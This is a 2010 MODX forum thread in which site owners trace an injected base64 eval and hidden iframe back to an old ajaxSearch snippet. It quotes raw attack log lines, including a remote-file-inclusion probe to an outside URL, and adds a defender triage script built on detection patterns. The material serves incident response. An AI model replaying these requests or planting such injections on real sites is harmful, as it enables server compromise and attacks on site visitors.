  • Quote from: banzai at Aug 04, 2010, 01:48 PM

    SMF 1.1.1

    If that’s version 1.1.1 and not version 1.1.10 or 1.1.11 then you have a really exploitable version of SMF installed. We in fact got bit by this ourselves last year. Everything you’ve experienced can be done by exploiting that security hole. You’d need to find out more details on the SMF site.
      Ryan Thrash, MODX Co-Founder
      Follow me on Twitter at @rthrash or catch my occasional unofficial thoughts at thrash.me
      • 18913
      • 654 Posts
      SMF is not installed on the setup I saw...
      Matt
        • 30879
        • 40 Posts
        Yep, no SMF for me either; actually, no other software is installed.
          • 2762
          • 1,198 Posts
          Quote from: rthrash at Aug 05, 2010, 04:16 PM

          Quote from: banzai at Aug 04, 2010, 01:48 PM

          SMF 1.1.1

          If that’s version 1.1.1 and not version 1.1.10 or 1.1.11 then you have a really exploitable version of SMF installed. We in fact got bit by this ourselves last year. Everything you’ve experienced can be done by exploiting that security hole. You’d need to find out more details on the SMF site.

          Sorry for the mistake, Ryan, it's SMF 1.1.11 ;)
            Free MODx Graphic resources and Templates www.tattoocms.it
            -----------------------------------------------------

            MODx IT  www.modx.it
            -----------------------------------------------------

            bubuna.com - Web & Multimedia Design
            • 14300
            • 1 Posts
            We now have an infected MODx site as well - with the same file and the same injection string. Like a couple of you, we aren't seeing that this came through w/FTP and don't have any other software running. I'm wondering if there's not a newly identified exploit that affects MODx. We haven't fully scanned web log files yet. If anyone has any progress in identifying the source of this attack, please post a reply to this thread.

            Our eval string was at the end of document.parser.class.inc.php

            Incidentally, the site is hosted at Rackspace's Cloud Sites (aka Mosso) but RS is saying they aren't responsible for it, so we're looking for any other possibilities. However, if any of you who are also experiencing the issue are hosted through RS Cloud, it might indicate a pattern. Here is a similar exploit I read about on GoDaddy Wordpress sites:
            http://www.whitefirdesign.com/resources/bibzoplcom-malware.html
              • 21246
              • 55 Posts
              FYI:

              Got hit by the same hack on MT grid on July 18th. MT said it was not them but around the same time they had that massive WP attack which also affected RS. No T/S change on the file. I am the only admin on a clean machine. Only used SFTP for access. No other users in MODX.

              Version 1.04

              I checked the DB tables/rows; all good. Source was clean, so the update (hack) to the manager/includes/document.parser.class.inc.php file occurred on the grid.

              I downloaded the site and compared it to my git clone; that was the only mod.

              I moved most of my sites off the grid to dedicated servers fully under my thumb. Things have been clean since.

              I can't prove it was them since I have no logs on the grid, but too many coincidences with all the WP and other CMSs hacked around that time.

                • 18913
                • 654 Posts
                The example I saw occurred on Bluehost.

                @jmarlin : did you see the help_y.php file and if so, were you able to uncompress and view the php?

                MattC
                  • 18913
                  • 654 Posts
                  Another thought : the example I saw had been installed with SimpleScripts, rather than manually. Have any of the other affected sites been similarly installed? Put differently, were any of the other sites manually installed?
                  MattC
                    • 7906
                    • 10 Posts
                    I also had a site that was infected a few weeks ago (i.e. the document.parser.class.inc.php file was infected with the same base64 code and injecting a hidden iframe into pages).

                    I was able to trace the vulnerability to what I believe was an old version of ajaxSearch, 1.8.1 (I have since found that the Modx team has warned that the older versions of this snippet are vulnerable).

                    I am pretty sure the attacker gained entry via the ajaxsearch snippet based on the log entries below.

                    I included the first three entries (at 1:21:55) because this might have been the probe that sent the notice back to the server that performed the attack (notice the request for the ajaxSearch_readme.txt file, which may be used to determine the current version). The attack came about 20 minutes later. Notice the GET with the base64_js parameter. Also, I found that the ajaxSearch directory had a timestamp of 1:44, the exact time of these requests. (This was the only timestamp on the site that was different from the timestamp of the last set of uploads.) It is likely that I am way off base here, but since removing ajaxSearch and restoring the document parser I have not had any problems. Google has reviewed the site and removed the warning as well.

                    Also, the same as with everyone else, the document parser timestamp had not changed. I have since removed ajaxSearch from the site until I upgrade to the latest version of Modx (currently running 0.9.6.3, ajaxSearch 1.8.1). Mostly, I need to take the blame for this by not keeping current with the Modx security issues that have been clearly posted.

                    FYI, I am now seeing some suspicious requests to the reflect snippet (see the 2nd log entry). It appears an attacker may be attempting an exploit of some nature. If anyone has any insight into this and whether or not I should be worried, please let me know.

                    Hopefully this might help any others on one of the older versions of Modx and more specifically ajaxSearch.

                    Doug

                    heloop.netplan.co.uk - - [14/Jul/2010:01:21:52 -0400] "GET /assets/snippets/ajaxSearch/ajaxSearch_readme.txt HTTP/1.1" 200 24841 "-" "-"
                    theloop.netplan.co.uk - - [14/Jul/2010:01:21:55 -0400] "GET /assets/snippets/ajaxSearch/ajax_g.php HTTP/1.1" 200 21244 "-" "-"
                    theloop.netplan.co.uk - - [14/Jul/2010:01:21:55 -0400] "GET /assets/snippets/ajaxSearch/ajax.php HTTP/1.1" 200 28546 "-" "-"
                    212.62.110.20 - - [14/Jul/2010:01:43:55 -0400] "GET /assets/snippets/ajaxSearch/ajax.php HTTP/1.1" 200 28976 "http://nubar.co.uk/thumbs/thumb/modxall/google_links.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
                    212.62.110.20 - - [14/Jul/2010:01:44:07 -0400] "GET /assets/snippets/ajaxSearch/ajax.php?base64_js HTTP/1.1" 200 2172 "http://..mywebsite../assets/snippets/ajaxSearch/ajax.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
                    212.62.110.20 - - [14/Jul/2010:01:43:57 -0400] "GET /assets/snippets/ajaxSearch/ajax.php?base64_js HTTP/1.1" 200 2172 "http://..mywebsite../assets/snippets/ajaxSearch/ajax.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
                    212.62.110.20 - - [14/Jul/2010:01:44:06 -0400] "POST /assets/snippets/ajaxSearch/ajax.php HTTP/1.1" 200 29302 "http://..mywebsite../assets/snippets/ajaxSearch/ajax.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
                    212.62.110.20 - - [14/Jul/2010:01:44:33 -0400] "POST /assets/snippets/ajaxSearch/ajax.php HTTP/1.1" 200 28751 "http://..mywebsite../assets/snippets/ajaxSearch/ajax.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
                    212.62.110.20 - - [14/Jul/2010:01:44:34 -0400] "GET /assets/snippets/ajaxSearch/ajax.php?base64_js HTTP/1.1" 404 6382 "http://..mywebsite../assets/snippets/ajaxSearch/ajax.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"

                    ea.f8.7bae.static.theplanet.com - - [08/Aug/2010:06:12:46 -0400] "GET /about//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.yptmtc.org/BU/bu/id? HTTP/1.1" 404 6206 "-" "libwww-perl/5.805"

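Doug's post reads the ajaxSearch readme probe, the base64_js requests and the remote reflect_base out of raw Apache logs by eye, and jmarlin's post finds the modified parser file only by diffing the site against a git clone, because (as several posts note) the file timestamp had not changed. The script below is an added example, not code from this thread or from MODX/ajaxSearch, that turns those observations into repeatable checks: a combined-log parser that flags the indicators named in the thread, a signature scan for the eval(base64_decode(...)) tail and hidden iframe described in the posts, and a hash comparison against a known-good tree that ignores mtime. All log lines, hosts, paths, the "infected" PHP and the indicator labels are constructed for the demo; only the indicator patterns come from the thread.

```python
# Added example (not code from this thread or from MODX/ajaxSearch): defender-side
# triage for the indicators the posts above describe. Log lines, hosts, paths and
# the "injected" PHP below are constructed; the indicator patterns are the thread's.
import hashlib
import re
from urllib.parse import parse_qs, urlsplit

# Apache "combined" log format, the layout of the lines quoted in the post.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

def parse_log_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # keep_blank_values matters: "?base64_js" carries no value at all.
    rec["query"] = parse_qs(parts.query, keep_blank_values=True)
    return rec

def classify(rec):
    """List the indicators one request matches; an empty list means nothing notable."""
    hits = []
    path = rec["path"].lower()
    if path.endswith("/ajaxsearch/ajaxsearch_readme.txt"):
        hits.append("version fingerprint: ajaxSearch readme fetched")
    if path.endswith("/ajaxsearch/ajax.php"):
        if "base64_js" in rec["query"]:
            hits.append("ajaxSearch called with base64_js")
        if rec["method"] == "POST":
            hits.append("POST to ajaxSearch snippet")
    if path.endswith("/reflect/snippet.reflect.php"):
        base = rec["query"].get("reflect_base", [""])[0]
        if base.startswith(("http://", "https://")):
            hits.append("reflect_base points at a remote URL")
    if rec["ua"].lower().startswith("libwww-perl"):
        hits.append("scripted client user-agent")
    return hits

def suspicious_requests(lines):
    """(host, path, indicators) for every parseable line that matches something."""
    out = []
    for line in lines:
        rec = parse_log_line(line)
        if rec is not None and (hits := classify(rec)):
            out.append((rec["host"], rec["path"], hits))
    return out

# The injection the posts describe: eval over base64 text appended to a PHP file,
# which then emits a hidden iframe. Wrapper calls between eval( and
# base64_decode( (gzinflate and the like) are tolerated.
EVAL_B64_RE = re.compile(r"eval\s*\(\s*(?:\w+\s*\(\s*)*base64_decode\s*\(", re.I)
HIDDEN_IFRAME_RE = re.compile(r"<iframe[^>]*(?:visibility\s*:\s*hidden|display\s*:\s*none)", re.I)

def scan_php(src):
    """(line number, finding) pairs for the injection signatures above."""
    findings = []
    for lineno, text in enumerate(src.splitlines(), 1):
        if EVAL_B64_RE.search(text):
            findings.append((lineno, "eval of base64-decoded code"))
        if HIDDEN_IFRAME_RE.search(text):
            findings.append((lineno, "hidden iframe"))
    return findings

def changed_files(known_good, deployed):
    """Compare a deployed tree with a known-good copy (e.g. a git clone) by SHA-256.
    Timestamps are ignored on purpose: the posts note the modified file's mtime
    had not changed, so mtime proves nothing here."""
    diffs = []
    for name, good in known_good.items():
        cur = deployed.get(name)
        if cur is None:
            diffs.append((name, "missing"))
        elif hashlib.sha256(cur).digest() != hashlib.sha256(good).digest():
            diffs.append((name, "modified"))
    diffs.extend((name, "unexpected") for name in deployed if name not in known_good)
    return diffs

# --- constructed sample data (documentation IP ranges, placeholder domains) ----
SAMPLE_LOG = [
    '192.0.2.10 - - [14/Jul/2010:01:21:52 -0400] "GET /assets/snippets/ajaxSearch/ajaxSearch_readme.txt HTTP/1.1" 200 24841 "-" "-"',
    '192.0.2.10 - - [14/Jul/2010:01:43:57 -0400] "GET /assets/snippets/ajaxSearch/ajax.php?base64_js HTTP/1.1" 200 2172 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [14/Jul/2010:01:44:06 -0400] "POST /assets/snippets/ajaxSearch/ajax.php HTTP/1.1" 200 29302 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [08/Aug/2010:06:12:46 -0400] "GET /about//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://remote.example/x? HTTP/1.1" 404 6206 "-" "libwww-perl/5.805"',
    '203.0.113.5 - - [14/Jul/2010:09:00:00 -0400] "GET /index.php?id=12 HTTP/1.1" 200 8312 "-" "Mozilla/5.0"',
    "not a log line at all",
]
CLEAN_PHP = "<?php\nclass DocumentParser {\n    function run() { return 'ok'; }\n}\n"
# Stand-in for the infected tail; this base64 decodes to the harmless string "AAAA".
INFECTED_PHP = CLEAN_PHP + (
    "eval(base64_decode('QUFBQQ=='));\n"
    "echo '<iframe src=\"http://remote.example/\" style=\"visibility:hidden\"></iframe>';\n"
)
PARSER = "manager/includes/document.parser.class.inc.php"

if __name__ == "__main__":
    for host, path, hits in suspicious_requests(SAMPLE_LOG):
        print(host, path, "; ".join(hits))
    print(scan_php(INFECTED_PHP))
    print(changed_files({PARSER: CLEAN_PHP.encode()},
                        {PARSER: INFECTED_PHP.encode(), "assets/help_y.php": b"<?php\n"}))
```

Run against a real access log, `suspicious_requests` groups the readme probe, the base64_js call and the POSTs by source host so the 20-minute probe-then-attack sequence Doug describes stands out; `changed_files` needs a trusted copy of the tree (a fresh download of the same release or a git checkout), since on the affected sites neither the mtime nor the database showed anything.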
                      • 30879
                      • 40 Posts
                      I'd really like to know this as well. Scary!

                      I'd like to see a shift to some type of easy updatability, where old files of plugin upgrades can be removed etc.

                      I know that if you go digging you can find all types of tips for securing modx, but you really have to dig for it.